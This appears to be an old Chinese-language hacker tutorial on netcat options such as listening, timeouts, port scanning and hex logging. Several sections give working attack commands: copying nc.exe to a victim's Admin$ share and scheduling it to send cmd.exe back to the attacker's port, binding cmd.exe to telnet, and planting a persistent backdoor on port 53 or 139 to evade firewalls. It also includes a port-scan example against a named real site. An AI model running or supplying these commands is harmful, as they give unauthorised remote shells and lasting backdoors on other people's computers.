一、-v
详细输出——用两个-v可得到更详细的内容,和其他参数连用。
二、-w secs
超时,以秒计。只在双机发生连接后开始计时。
三、-p port
打开本地端口号。例:nc -p 8888
四、-l
监听模式,用于入站连接。和-v参数与>>符合连用可以记录本机接收到
的数据包。例:(nc -vv -w 5 -l -p 80>>80.txt),这样就把80端口收
到的数据写入txt文件中,连接5秒后会自动断开。可以做个批处理文件看:
@echo off
color f0
:start
cls
C:\\nc -vv -w 3 -l -p 80>>80.txt
goto start
把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多
是三条一组--妮姆达病毒扫描你的。
五、-e prog
程序重定向,一旦连接,就执行。例:(nc -e 程序名称 IP 端口)
应用举例:
先把nc.exe传到对方电脑的winnt下(即Admin$下),令cmd.exe在上
午十点二十五分连接到自己的7878端口:
at \\\\对方IP 10:25Am nc -e cmd.exe 自己IP 7878
在自己电脑上用-l参数和-p参数开7878端口监听(nc -vv -l -p 7878)
这样只要对方连接过来,我们就进入了他的winnt\\system32文件夹下。
也可以:at \\\\对方IP 10:25Am nc -l -p 23 -t -e cmd.exe 这是绑定
cmd.exe到telnet端口等待连接,直接telnet IP就可以进入对方机器。
六、-h
帮助
七、端口扫描
例(nc -vv IP地址 -w 2 80 21-25 1433),这就是一个简单的端口扫描
器,将按照主机名--IP--端口(名称)--端口状态来显示,如果不加-w
参数,扫到端口后会停下来等待用户输入命令。
八、-o file
记录16进制的传输。和>>file有点象似,第一列是内存地址,第二列是
16进制的字符码,第三列是接收到的报文。例如探测网络焦点的端口:
(nc -vv -w 2 -o test.txt www.xfocus.net 80 21-25),会将报文写入
一个test.txt的文件中去。
九、-L与-e参数配合
在对方电脑上运行(nc -L -p 53 -d -e cmd.exe),可以突破防火墙。
-L参数是即使本次连接断掉,nc.exe仍然在运行。53号端口是Domain Name
Server域名服务端口,应该不会受到防火墙的封索,我们用nc vv IP 53
这样就连进去啦。并且只要nc进程不被杀掉,这个后门一直存在。嘿嘿,
说是这样说,第三方应用程序例如天网就能把nc拦住,我试了139、1025、
445都无效 那个-d参数是为了出错后不显示信息。139要加参数-s(nc
-L -p 139 -d -e cmd.exe -s 对方本机IP)这样就可以保证nc.exe优先
于NETBIOS。
|
